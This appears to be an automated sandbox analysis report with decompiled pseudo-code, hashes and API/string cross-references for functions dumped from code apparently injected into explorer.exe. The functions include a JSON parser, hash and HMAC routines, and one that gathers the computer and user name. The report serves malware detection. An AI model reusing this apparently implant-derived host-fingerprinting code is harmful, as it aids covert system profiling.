Opcode ID: db5ecda2a4b9d3024ada1ac63caeda6ff1750473763ba2e5f4433fd45b4154ec
Instruction ID: 3ba5b51c818dae67d7501a129e01dd125f747648958b67f494b6d141c7beb323
Opcode Fuzzy Hash: db5ecda2a4b9d3024ada1ac63caeda6ff1750473763ba2e5f4433fd45b4154ec
Instruction Fuzzy Hash: 4071E2B5E40209EBFF16DFD4E889FAE77B0BB54314F008519E9226F289E7749A41CB41

Uniqueness

Uniqueness Score: 100.00%

Function 01522BD0, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01522BD0(void* __eax, void* __ebx, void* __ecx, signed int _a4) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t29;
				intOrPtr _t31;
				int _t33;
				void* _t34;
				void* _t43;
				void* _t45;
				void* _t53;
				void* _t57;
				intOrPtr _t65;
				void* _t67;
				void* _t71;
				void* _t75;
				void* _t76;
				void* _t79;
				void* _t80;
				void* _t81;

				_t57 = __ebx;
				_push(__ecx);
				_t71 = __eax;
				_t65 = E01521850(__ecx);
				_v8 = _t65;
				if(_t65 == 0) {
					L26:
					return 0;
				} else {
					E01522980(__ebx, __ecx, _t71);
					_t29 =  *((intOrPtr*)(_t71 + 0x3c));
					_t76 = _t75 + 4;
					if(_t29 != 0x7d) {
						if(_t29 != 0x100) {
							L14:
							_push("string or \'}\' expected");
							goto L22;
						} else {
							if( *((intOrPtr*)(_t71 + 0x3c)) == _t29) {
								while(1) {
									_t67 =  *(_t71 + 0x40);
									_t33 =  *(_t71 + 0x44);
									 *(_t71 + 0x40) = 0;
									 *(_t71 + 0x44) = 0;
									if(_t67 == 0) {
										goto L26;
									}
									_t34 = memchr(_t67, 0, _t33);
									_t79 = _t76 + 0xc;
									if(_t34 != 0) {
										E01523B80(_t67);
										_push("NUL byte in object key not supported");
										_push(0xd);
										_push(_t57);
										E01521F10(_t71);
										L23:
										_t31 = _v8;
										if( *((intOrPtr*)(_t31 + 4)) != 0xffffffff) {
											_t20 = _t31 + 4;
											 *_t20 =  *((intOrPtr*)(_t31 + 4)) - 1;
											if( *_t20 == 0) {
												E01521CC0(_t31);
											}
										}
										goto L26;
									} else {
										if((_a4 & 0x00000001) == 0) {
											L9:
											E01522980(_t57, 0, _t71);
											_t80 = _t79 + 4;
											if( *((intOrPtr*)(_t71 + 0x3c)) != 0x3a) {
												E01523B80(_t67);
												_push("\':\' expected");
												_push(8);
												_push(_t57);
												E01521F10(_t71);
												goto L23;
											} else {
												E01522980(_t57, 0, _t71);
												_t61 = _a4;
												_t43 = E01522E30(_t71, _a4, _t57);
												_t81 = _t80 + 0x10;
												if(_t43 == 0) {
													_push(_t67);
													goto L19;
												} else {
													_t45 = E01521D60(_v8, _t67, _t43);
													_t81 = _t81 + 0xc;
													_push(_t67);
													if(_t45 != 0) {
														L19:
														E01523B80();
														goto L23;
													} else {
														E01523B80();
														E01522980(_t57, _t61, _t71);
														_t76 = _t81 + 8;
														if( *((intOrPtr*)(_t71 + 0x3c)) != 0x2c) {
															if( *((intOrPtr*)(_t71 + 0x3c)) == 0x7d) {
																return _v8;
															} else {
																_push("\'}\' expected");
																L22:
																_push(8);
																_push(_t57);
																E01521F10(_t71);
																goto L23;
															}
														} else {
															E01522980(_t57, _t61, _t71);
															_t76 = _t76 + 4;
															if( *((intOrPtr*)(_t71 + 0x3c)) == 0x100) {
																continue;
															} else {
																goto L14;
															}
														}
													}
												}
											}
										} else {
											_t53 = E015218D0(_v8, _t67);
											_t79 = _t79 + 8;
											if(_t53 != 0) {
												E01523B80(_t67);
												_push("duplicate object key");
												_push(0xe);
												_push(_t57);
												E01521F10(_t71);
												goto L23;
											} else {
												goto L9;
											}
										}
									}
									goto L28;
								}
							}
							goto L26;
						}
					} else {
						return _t65;
					}
				}
				L28:
			}

0x01522bd0
0x01522bd3
0x01522bd6
0x01522bdd
0x01522bdf
0x01522be4
0x01522d5d
0x01522d64
0x01522bea
0x01522bed
0x01522bf2
0x01522bf5
0x01522bfb
0x01522c0a
0x01522cd1
0x01522cd1
0x00000000
0x01522c10
0x01522c13
0x01522c19
0x01522c19
0x01522c1c
0x01522c21
0x01522c24
0x01522c29
0x00000000
0x00000000
0x01522c32
0x01522c37
0x01522c3c
0x01522cd9
0x01522cde
0x01522ce3
0x01522ce5
0x01522ce6
0x01522d41
0x01522d41
0x01522d4a
0x01522d4c
0x01522d4c
0x01522d52
0x01522d55
0x01522d5a
0x01522d52
0x00000000
0x01522c42
0x01522c46
0x01522c5d
0x01522c60
0x01522c65
0x01522c6c
0x01522d09
0x01522d0e
0x01522d13
0x01522d15
0x01522d16
0x00000000
0x01522c72
0x01522c75
0x01522c7a
0x01522c80
0x01522c85
0x01522c8a
0x01522d20
0x00000000
0x01522c90
0x01522c96
0x01522c9b
0x01522c9e
0x01522ca1
0x01522d21
0x01522d21
0x00000000
0x01522ca3
0x01522ca3
0x01522cab
0x01522cb0
0x01522cb7
0x01522d2f
0x01522d6d
0x01522d31
0x01522d31
0x01522d36
0x01522d36
0x01522d38
0x01522d39
0x00000000
0x01522d3e
0x01522cb9
0x01522cbc
0x01522cc1
0x01522ccb
0x00000000
0x00000000
0x00000000
0x00000000
0x01522ccb
0x01522cb7
0x01522ca1
0x01522c8a
0x01522c48
0x01522c4d
0x01522c52
0x01522c57
0x01522cf1
0x01522cf6
0x01522cfb
0x01522cfd
0x01522cfe
0x00000000
0x00000000
0x00000000
0x00000000
0x01522c57
0x01522c46
0x00000000
0x01522c3c
0x01522c19
0x00000000
0x01522c13
0x01522bfd
0x01522c04
0x01522c04
0x01522bfb
0x00000000

APIs

memchr.MSVCRT(?,00000000,?,00000000,00000000,?,00000000), ref: 01522C32

Strings

NUL byte in object key not supported, xrefs: 01522CDE
duplicate object key, xrefs: 01522CF6
'}' expected, xrefs: 01522D31
string or '}' expected, xrefs: 01522CD1
':' expected, xrefs: 01522D0E

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memchr
String ID: ':' expected$'}' expected$NUL byte in object key not supported$duplicate object key$string or '}' expected
API String ID: 3297308162-1703134727
Opcode ID: 320e99a5779521c61821b0badbe571d76b05b60ab475248130618fc1ffa609c2
Instruction ID: 62d794f381ad018a220e615dd9d5c8e1791c254185eb880fd7ca516be7fd4624
Opcode Fuzzy Hash: 320e99a5779521c61821b0badbe571d76b05b60ab475248130618fc1ffa609c2
Instruction Fuzzy Hash: E6412B7BA0023277D720666C9C81D6F73ACBFE7154F04062DF805AF6C2E665E91146A2

Uniqueness

Uniqueness Score: 8.94%

Function 015085E0, Relevance: 9.1, APIs: 6, Instructions: 131
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E015085E0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, WCHAR* _a24) {
				struct _CRITICAL_SECTION* _v8;
				long _v12;
				WCHAR* _v24;
				void* _v28;
				char _v32;
				intOrPtr* _t47;
				struct _CRITICAL_SECTION* _t48;
				struct _CRITICAL_SECTION* _t55;
				void* _t63;
				int _t67;
				void* _t68;
				void* _t78;

				_t80 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t47 =  *0x1535148; // 0x15379f8
				_v12 = 0;
				_v8 = 0;
				if( *_t47 != 0) {
					L3:
					_t48 = E01513960(_t80, 0x650);
					_v8 = _t48;
					if(_t48 == 0) {
						L2:
						return 0;
					}
					 *((intOrPtr*)(_t48 + 0x618)) = _a4;
					 *((intOrPtr*)(_v8 + 0x61c)) = _a8;
					 *((intOrPtr*)(_v8 + 0x620)) = _a12;
					 *((intOrPtr*)(_v8 + 0x624)) = _a16;
					 *((intOrPtr*)(_v8 + 0x628)) = E01516C90(_a20);
					if(_a24 == 0 || lstrlenW(_a24) <= 0) {
						 *((intOrPtr*)(_v8 + 0x62c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x62c)) = E01516C90(_a24);
					}
					_t55 = _v8;
					_t88 = _t55 + 0x628;
					if( *((intOrPtr*)(_t55 + 0x628)) != 0) {
						_v12 = 0x200;
						GetComputerNameW(_t55 + 0x18,  &_v12);
						_v12 = 0x200;
						GetUserNameW(_v8 + 0x218,  &_v12);
						_t63 = _v8 + 0x18;
						if(_t63 != 0) {
							_push( &_v32);
							_push(0x64);
							_push(_t63);
							if( *0x15379e8() != 0 || _v24 == 0) {
								 *((short*)(_v8 + 0x418)) = 0;
							} else {
								_t67 = lstrlenW(_v24);
								_t92 = _t67;
								_t93 = _t67 + _t92;
								_t68 = 0x1fe;
								if(_t67 + _t92 <= 0x1fe) {
									_t68 = lstrlenW(_v24) + _t72;
								}
								E01513AC0(_t93, _v8 + 0x418, _v24, _t68);
							}
						}
						InitializeCriticalSection(_v8);
						return _v8;
					} else {
						E01513990(_t88, 0);
						E01513990( &_v8, 0);
						goto L2;
					}
				}
				_push(0);
				_t78 = E01516520(__ecx, 0x1535148);
				_pop(_t80);
				if(_t78 >= 0) {
					goto L3;
				}
				goto L2;
			}

0x015085e0
0x015085ec
0x015085f2
0x015085f3
0x015085f4
0x015085f5
0x015085f6
0x015085fb
0x015085fe
0x01508603
0x0150861d
0x01508622
0x01508628
0x0150862d
0x01508616
0x00000000
0x01508616
0x01508635
0x01508641
0x0150864d
0x01508659
0x0150866e
0x01508677
0x01508699
0x01508682
0x0150868e
0x0150868e
0x0150869f
0x015086a2
0x015086aa
0x015086cd
0x015086d4
0x015086e7
0x015086ee
0x015086f7
0x015086fc
0x01508701
0x01508702
0x01508704
0x0150870d
0x01508749
0x01508714
0x01508717
0x01508719
0x0150871b
0x0150871d
0x01508724
0x0150872b
0x0150872b
0x0150873a
0x0150873f
0x0150870d
0x01508753
0x00000000
0x015086ac
0x015086ae
0x015086b8
0x00000000
0x015086bd
0x015086aa
0x01508605
0x0150860b
0x01508611
0x01508614
0x00000000
0x00000000
0x00000000

APIs

lstrlenW.KERNEL32(?), ref: 0150867C

Part of subcall function 01516520: GetModuleHandleA.KERNEL32(?), ref: 01516575

GetComputerNameW.KERNEL32(?,?), ref: 015086D4
GetUserNameW.ADVAPI32(?,00000200), ref: 015086EE
lstrlenW.KERNEL32(?), ref: 01508717
lstrlenW.KERNEL32(?), ref: 01508729
InitializeCriticalSection.KERNEL32(?), ref: 01508753

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$Name$ComputerCriticalHandleInitializeModuleSectionUser
String ID:
API String ID: 1349676041-0
Opcode ID: 4ee4cc93a59dd0852f8becbd0238eeba5384481d7fa1325f6f67e187eaedbc1b
Instruction ID: b0197cbffd2fa1783b5d4f605285954d3d033da0d8e05a9e6a44698ba73a1851
Opcode Fuzzy Hash: 4ee4cc93a59dd0852f8becbd0238eeba5384481d7fa1325f6f67e187eaedbc1b
Instruction Fuzzy Hash: 774158B5E0020AEFDF12DFA8C8849AD77B5FB58304F250469E505EB291D7319A509B64

Uniqueness

Uniqueness Score: 5.54%

Function 0151349A, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0151349A(void* _a4, intOrPtr _a8) {
				void* _t47;
				signed int _t48;
				signed int _t49;
				intOrPtr* _t61;
				void* _t63;
				void* _t66;
				void* _t69;
				char* _t71;
				char* _t77;
				char* _t84;
				int _t85;
				void* _t86;
				void* _t87;

				_t86 = _a4;
				_t71 = "psAssert %s";
				_t84 = ":%d ";
				if(_t86 == 0) {
					_push("crypto\\digest\\sha256.c");
					_push(_t71);
					_t69 = E01510CBC(_t47);
					_push(0x129);
					_push(_t84);
					E01510CBC(_t69);
					_t47 = E01510B84("md != NULL");
					_t87 = _t87 + 0x14;
				}
				if(_a8 == 0) {
					_push("crypto\\digest\\sha256.c");
					_push(_t71);
					_t66 = E01510CBC(_t47);
					_push(0x12a);
					_push(_t84);
					E01510CBC(_t66);
					E01510B84("hash != NULL");
					_t87 = _t87 + 0x14;
				}
				_t48 =  *(_t86 + 0x28);
				if(_t48 < 0x40) {
					 *_t86 =  *_t86 + (_t48 << 3);
					asm("adc dword [esi+0x4], 0x0");
					 *((char*)(_t48 + _t86 + 0x2c)) = 0x80;
					 *(_t86 + 0x28) =  *(_t86 + 0x28) + 1;
					_t49 =  *(_t86 + 0x28);
					if(_t49 > 0x38) {
						while(_t49 < 0x40) {
							 *((char*)(_t49 + _t86 + 0x2c)) = 0;
							 *(_t86 + 0x28) =  *(_t86 + 0x28) + 1;
							_t49 =  *(_t86 + 0x28);
						}
						E01513321(_t86, _t86 + 0x2c);
						 *(_t86 + 0x28) =  *(_t86 + 0x28) & 0x00000000;
						L12:
						while( *(_t86 + 0x28) < 0x38) {
							 *((char*)( *(_t86 + 0x28) + _t86 + 0x2c)) = 0;
							 *(_t86 + 0x28) =  *(_t86 + 0x28) + 1;
						}
						 *((char*)(_t86 + 0x64)) =  *((intOrPtr*)(_t86 + 7));
						 *((char*)(_t86 + 0x65)) =  *((intOrPtr*)(_t86 + 6));
						 *((char*)(_t86 + 0x66)) =  *((intOrPtr*)(_t86 + 5));
						 *((char*)(_t86 + 0x67)) =  *((intOrPtr*)(_t86 + 4));
						 *((char*)(_t86 + 0x68)) =  *((intOrPtr*)(_t86 + 3));
						 *((char*)(_t86 + 0x69)) =  *((intOrPtr*)(_t86 + 2));
						 *((char*)(_t86 + 0x6a)) =  *((intOrPtr*)(_t86 + 1));
						 *((char*)(_t86 + 0x6b)) =  *_t86;
						E01513321(_t86, _t86 + 0x2c);
						_t77 = _a8 + 2;
						_t61 = _t86 + 0xa;
						_t85 = 8;
						do {
							 *((char*)(_t77 - 2)) =  *((intOrPtr*)(_t61 + 1));
							 *((char*)(_t77 - 1)) =  *_t61;
							 *_t77 =  *((intOrPtr*)(_t61 - 1));
							 *((char*)(_t77 + 1)) =  *((intOrPtr*)(_t61 - 2));
							_t61 = _t61 + 4;
							_t77 = _t77 + 4;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
						memset(_t86, _t85, 0xd0);
						_push(0x20);
						goto L16;
					}
					goto L12;
				} else {
					_push(0xfffffffa);
				}
				L16:
				_pop(_t63);
				return _t63;
			}

0x0151349f
0x015134a3
0x015134a8
0x015134af
0x015134b1
0x015134b6
0x015134b7
0x015134bc
0x015134c1
0x015134c2
0x015134cc
0x015134d1
0x015134d1
0x015134d8
0x015134da
0x015134df
0x015134e0
0x015134e5
0x015134ea
0x015134eb
0x015134f5
0x015134fa
0x015134fa
0x015134fd
0x01513503
0x01513511
0x01513513
0x01513517
0x0151351c
0x0151351f
0x01513525
0x01513534
0x01513529
0x0151352e
0x01513531
0x01513531
0x0151353e
0x01513543
0x00000000
0x01513556
0x0151354e
0x01513553
0x01513553
0x0151355f
0x01513565
0x0151356b
0x01513571
0x01513577
0x0151357d
0x01513583
0x01513588
0x01513590
0x0151359c
0x0151359f
0x015135a2
0x015135a3
0x015135a6
0x015135ab
0x015135b1
0x015135b6
0x015135b9
0x015135bc
0x015135bf
0x015135bf
0x015135c9
0x015135d1
0x00000000
0x015135d1
0x00000000
0x01513505
0x01513505
0x01513505
0x015135d3
0x015135d3
0x015135d8

APIs

memset.MSVCRT(?,00000007,000000D0,?,?,00000080,?,0151101D,?,00000000), ref: 015135C9

Strings

crypto\digest\sha256.c, xrefs: 015134B1, 015134DA
psAssert %s, xrefs: 015134A3, 015134B6, 015134DF
:%d , xrefs: 015134A8, 015134C1, 015134EA
hash != NULL, xrefs: 015134F0
md != NULL, xrefs: 015134C7

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memset
String ID: :%d $crypto\digest\sha256.c$hash != NULL$md != NULL$psAssert %s
API String ID: 2221118986-896315226
Opcode ID: 5d1dfb21d87aa9450baa89cf782dfd511c44d4f94beb7418279fa278b24e890a
Instruction ID: 9b74f65c80ecb72508ba40e001b77d930f4ed48583c99b2f99d344552501dbf8
Opcode Fuzzy Hash: 5d1dfb21d87aa9450baa89cf782dfd511c44d4f94beb7418279fa278b24e890a
Instruction Fuzzy Hash: E5410636109BC15DE3239B688490AABFFE4BF2B534F08498ED4DA0FB93C650E545CB25

Uniqueness

Uniqueness Score: 10.55%

Function 01512E35, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01512E35(void* __edx, intOrPtr* _a4, void* _a8, int _a12) {
				void* _t27;
				signed int _t28;
				void* _t31;
				void* _t33;
				char* _t35;
				int _t37;
				void* _t40;
				char* _t41;
				intOrPtr* _t43;
				void* _t44;

				_t40 = __edx;
				_t43 = _a4;
				_t35 = "psAssert %s";
				_t41 = ":%d ";
				if(_t43 == 0) {
					_push("crypto\\digest\\sha512.c");
					_push(_t35);
					_t33 = E01510CBC(_t27);
					_push(0xb9);
					_push(_t41);
					E01510CBC(_t33);
					_t27 = E01510B84("md != NULL");
					_t44 = _t44 + 0x14;
				}
				if(_a8 == 0) {
					_push("crypto\\digest\\sha512.c");
					_push(_t35);
					_t31 = E01510CBC(_t27);
					_push(0xba);
					_push(_t41);
					E01510CBC(_t31);
					_t27 = E01510B84("buf != NULL");
					_t44 = _t44 + 0x14;
				}
				while(_a12 > 0) {
					_t28 =  *(_t43 + 0x48);
					if(_t28 != 0 || _a12 < 0x80) {
						_t37 = 0x80 - _t28;
						if(_a12 < _t37) {
							_t37 = _a12;
						}
						_t27 = memcpy(_t28 + _t43 + 0x4c, _a8, _t37);
						 *(_t43 + 0x48) =  *(_t43 + 0x48) + _t37;
						_a8 = _a8 + _t37;
						_a12 = _a12 - _t37;
						_t44 = _t44 + 0xc;
						if( *(_t43 + 0x48) == 0x80) {
							_t27 = E01512E18(_t40, _t43, _t43 + 0x4c);
							 *_t43 =  *_t43 + 0x400;
							asm("adc dword [esi+0x4], 0x0");
							 *(_t43 + 0x48) =  *(_t43 + 0x48) & 0x00000000;
							goto L13;
						}
					} else {
						_t27 = E01512E18(_t40, _t43, _a8);
						 *_t43 =  *_t43 + 0x400;
						asm("adc dword [esi+0x4], 0x0");
						_a8 = _a8 + 0x80;
						_a12 = _a12 - 0x80;
						L13:
					}
				}
				return _t27;
			}

0x01512e35
0x01512e3a
0x01512e3e
0x01512e43
0x01512e4a
0x01512e4c
0x01512e51
0x01512e52
0x01512e57
0x01512e5c
0x01512e5d
0x01512e67
0x01512e6c
0x01512e6c
0x01512e73
0x01512e75
0x01512e7a
0x01512e7b
0x01512e80
0x01512e85
0x01512e86
0x01512e90
0x01512e95
0x01512e95
0x01512e9c
0x01512ea3
0x01512ea8
0x01512ecc
0x01512ed1
0x01512ed3
0x01512ed3
0x01512edf
0x01512ee4
0x01512ee7
0x01512eea
0x01512eed
0x01512ef3
0x01512efa
0x01512eff
0x01512f05
0x01512f09
0x00000000
0x01512f09
0x01512eaf
0x01512eb3
0x01512eb8
0x01512ebe
0x01512ec2
0x01512ec5
0x01512f0d
0x01512f0e
0x01512f0f
0x01512f19

APIs

memcpy.MSVCRT(?,00000000,00000080), ref: 01512EDF

Strings

psAssert %s, xrefs: 01512E3E, 01512E51, 01512E7A
buf != NULL, xrefs: 01512E8B
crypto\digest\sha512.c, xrefs: 01512E4C, 01512E75
:%d , xrefs: 01512E43, 01512E5C, 01512E85
md != NULL, xrefs: 01512E62

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: :%d $buf != NULL$crypto\digest\sha512.c$md != NULL$psAssert %s
API String ID: 3510742995-1034322979
Opcode ID: 57a8377eb0190b3098cefc4fec7b61533556fa64da1d9b328f417f6c75bc4c4b
Instruction ID: b901b9303bef4235ce579a4db2ff1aa4b039ad6bdf4fb633abe1e8d268589725
Opcode Fuzzy Hash: 57a8377eb0190b3098cefc4fec7b61533556fa64da1d9b328f417f6c75bc4c4b
Instruction Fuzzy Hash: 5E21F97290071A9FEB22AE15C8807AF73A4FF50225F10442EFE150E085E7B4D9408B91

Uniqueness

Uniqueness Score: 8.94%

Function 01510CBD, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E01510CBD(signed char* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t9;
				void* _t11;
				void* _t12;
				signed char* _t15;
				signed char* _t18;
				void* _t19;
				void* _t28;
				void* _t29;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				signed char* _t36;
				void* _t38;

				_t35 = _a12;
				if(_t35 > 0x40) {
					_push("crypto\\digest\\hmac.c");
					_push("psAssert %s");
					_t19 = E01510CBC(_t9);
					_push(0xb6);
					_push(":%d ");
					E01510CBC(_t19);
					E01510B84("keyLen <= 64");
					_t38 = _t38 + 0x14;
				}
				_t36 = _a4;
				if(_t35 != 0) {
					_t18 = _t36;
					_t32 = _a8 - _t36;
					_t34 = _t35;
					do {
						 *_t18 =  *(_t32 + _t18) ^ 0x00000036;
						_t18 =  &(_t18[1]);
						_t34 = _t34 - 1;
					} while (_t34 != 0);
				}
				if(_t35 < 0x40) {
					_t29 = 0x40;
					memset( &(_t36[_t35]), 0x36, _t29 - _t35);
					_t38 = _t38 + 0xc;
				}
				E015128AA( &(_t36[0x80]));
				_t11 = E01512911( &(_t36[0x80]), _t36, 0x40);
				if(_t35 != 0) {
					_t15 = _t36;
					_t28 = _a8 - _t36;
					_t33 = _t35;
					do {
						 *_t15 = _t15[_t28] ^ 0x0000005c;
						_t15 =  &(_t15[1]);
						_t33 = _t33 - 1;
					} while (_t33 != 0);
				}
				if(_t35 < 0x40) {
					_t12 = 0x40;
					return memset( &(_t36[_t35]), 0x5c, _t12 - _t35);
				}
				return _t11;
			}

0x01510cc3
0x01510cc9
0x01510ccb
0x01510cd0
0x01510cd5
0x01510cda
0x01510cdf
0x01510ce4
0x01510cee
0x01510cf3
0x01510cf3
0x01510cf6
0x01510cfb
0x01510d00
0x01510d02
0x01510d04
0x01510d06
0x01510d0c
0x01510d0e
0x01510d0f
0x01510d0f
0x01510d06
0x01510d15
0x01510d19
0x01510d23
0x01510d28
0x01510d28
0x01510d32
0x01510d3b
0x01510d45
0x01510d4a
0x01510d4c
0x01510d4e
0x01510d50
0x01510d56
0x01510d58
0x01510d59
0x01510d59
0x01510d50
0x01510d5f
0x01510d63
0x00000000
0x01510d71
0x01510d78

APIs

memset.MSVCRT(?,00000036,00000040), ref: 01510D23
memset.MSVCRT(?,0000005C,00000040), ref: 01510D6C

Strings

psAssert %s, xrefs: 01510CD0
:%d , xrefs: 01510CDF
keyLen <= 64, xrefs: 01510CE9
crypto\digest\hmac.c, xrefs: 01510CCB

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memset
String ID: :%d $crypto\digest\hmac.c$keyLen <= 64$psAssert %s
API String ID: 2221118986-3525758520
Opcode ID: 74df3764a6878bec17b5e4c3e7de938cb100364b81124246313b14ade102e9c0
Instruction ID: ff325dfe73c22e18a821968accfe729262eea394e62aa289fa37b8afec373fcb
Opcode Fuzzy Hash: 74df3764a6878bec17b5e4c3e7de938cb100364b81124246313b14ade102e9c0
Instruction Fuzzy Hash: C2119E727403062AFA23393D8C45F6F7B09BBE6550F19041EFE495F2CAE9B15840C1A0

Uniqueness

Uniqueness Score: 10.55%

Function 01510F97, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E01510F97(void* __edx, void* _a4, void* _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t11;
				void* _t24;
				void* _t25;
				void* _t31;
				void* _t32;
				void* _t36;

				_t31 = __edx;
				_t32 = _a4;
				if(_t32 == 0) {
					_push("crypto\\digest\\hmac.c");
					_push("psAssert %s");
					_t25 = E01510CBC(_t11);
					_push(0x14b);
					_push(":%d ");
					E01510CBC(_t25);
					E01510B84("ctx != NULL");
					_t36 = _t36 + 0x14;
				}
				if(_a8 != 0) {
					_push(_a8);
					_t34 = _t32 + 0x80;
					_push(_t32 + 0x80);
					if(_a12 != 0x30) {
						E0151349A();
						E0151333C(_t34);
						E015133B8(_t34, _t32, 0x40);
						E015133B8(_t34, _a8, 0x20);
						E0151349A(_t34, _a8);
					} else {
						E01513146(0x80, _t32, _t34);
						E0151308C(_t34);
						_push(0x80);
						_push(_t32);
						E0151313D(_t31, _t34);
						_push(0x30);
						_push(_a8);
						E0151313D(_t31, _t34);
						E01513146(0x80, _t32, _t34, _t34, _a8);
					}
					memset(_t32, 0, 0x80);
					return _a12;
				} else {
					_t24 = 0xfffffffa;
					return _t24;
				}
			}

0x01510f97
0x01510f9b
0x01510fa0
0x01510fa2
0x01510fa7
0x01510fac
0x01510fb1
0x01510fb6
0x01510fbb
0x01510fc5
0x01510fca
0x01510fca
0x01510fd1
0x01510fde
0x01510fe1
0x01510fec
0x01510fed
0x01511018
0x0151101e
0x01511027
0x01511032
0x0151103b
0x01510fef
0x01510fef
0x01510ff5
0x01510ffa
0x01510ffb
0x01510ffd
0x01511002
0x01511004
0x01511008
0x01511011
0x01511011
0x01511047
0x00000000
0x01510fd3
0x01510fd5
0x00000000
0x01510fd5

APIs

memset.MSVCRT(?,00000000,00000080), ref: 01511047

Part of subcall function 01513146: memcpy.MSVCRT(00000000,?,00000030,00000000,?), ref: 015131C8

Strings

psAssert %s, xrefs: 01510FA7
ctx != NULL, xrefs: 01510FC0
:%d , xrefs: 01510FB6
crypto\digest\hmac.c, xrefs: 01510FA2
0, xrefs: 01510FD8

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memcpymemset
String ID: 0$:%d $crypto\digest\hmac.c$ctx != NULL$psAssert %s
API String ID: 1297977491-3951686702
Opcode ID: 975d230f35af97be12ad8027c09b3445a66a7f6b0113724ef13bf45b5efd921a
Instruction ID: 96ec0c627aeb2e75e65a9256ccd7211442d7e45a54e4d938ff108cd9f353937b
Opcode Fuzzy Hash: 975d230f35af97be12ad8027c09b3445a66a7f6b0113724ef13bf45b5efd921a
Instruction Fuzzy Hash: 0D11063168126B7AFE533B554C81FCF7B28BFE6674F008404FA182D0C99BB4560586BA

Uniqueness

Uniqueness Score: 7.75%

Function 01512911, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E01512911(intOrPtr* _a4, void* _a8, int _a12) {
				void* _t16;
				void* _t19;
				void* _t21;
				char* _t23;
				int _t24;
				char* _t26;
				void* _t27;
				int _t28;
				intOrPtr* _t29;
				void* _t30;

				_t29 = _a4;
				_t23 = "psAssert %s";
				_t26 = ":%d ";
				if(_t29 == 0) {
					_push("crypto\\digest\\sha1.c");
					_push(_t23);
					_t21 = E01510CBC(_t16);
					_push(0xbb);
					_push(_t26);
					E01510CBC(_t21);
					_t16 = E01510B84("md != NULL");
					_t30 = _t30 + 0x14;
				}
				if(_a8 == 0) {
					_push("crypto\\digest\\sha1.c");
					_push(_t23);
					_t19 = E01510CBC(_t16);
					_push(0xbc);
					_push(_t26);
					E01510CBC(_t19);
					_t16 = E01510B84("buf != NULL");
					_t30 = _t30 + 0x14;
				}
				_t24 = _a12;
				while(_t24 != 0) {
					_t27 = 0x40;
					_t28 = _t27 -  *(_t29 + 0x1c);
					if(_t24 < _t28) {
						_t28 = _t24;
					}
					_t16 = memcpy( *(_t29 + 0x1c) + _t29 + 0x20, _a8, _t28);
					 *(_t29 + 0x1c) =  *(_t29 + 0x1c) + _t28;
					_a8 = _a8 + _t28;
					_t30 = _t30 + 0xc;
					_t24 = _t24 - _t28;
					if( *(_t29 + 0x1c) == 0x40) {
						_t16 = E01512890(_t29);
						 *_t29 =  *_t29 + 0x200;
						asm("adc dword [esi+0x4], 0x0");
						 *(_t29 + 0x1c) =  *(_t29 + 0x1c) & 0x00000000;
					}
				}
				return _t16;
			}

0x01512916
0x0151291a
0x0151291f
0x01512926
0x01512928
0x0151292d
0x0151292e
0x01512933
0x01512938
0x01512939
0x01512943
0x01512948
0x01512948
0x0151294f
0x01512951
0x01512956
0x01512957
0x0151295c
0x01512961
0x01512962
0x0151296c
0x01512971
0x01512971
0x01512974
0x015129bc
0x0151297b
0x0151297c
0x01512981
0x01512983
0x01512983
0x01512991
0x01512996
0x01512999
0x0151299c
0x0151299f
0x015129a5
0x015129a8
0x015129ad
0x015129b4
0x015129b8
0x015129b8
0x015129a5
0x015129c4

APIs

memcpy.MSVCRT(?,00000000,?,?,?,?,?,01510D40,?,?,00000040,?), ref: 01512991

Strings

crypto\digest\sha1.c, xrefs: 01512928, 01512951
psAssert %s, xrefs: 0151291A, 0151292D, 01512956
buf != NULL, xrefs: 01512967
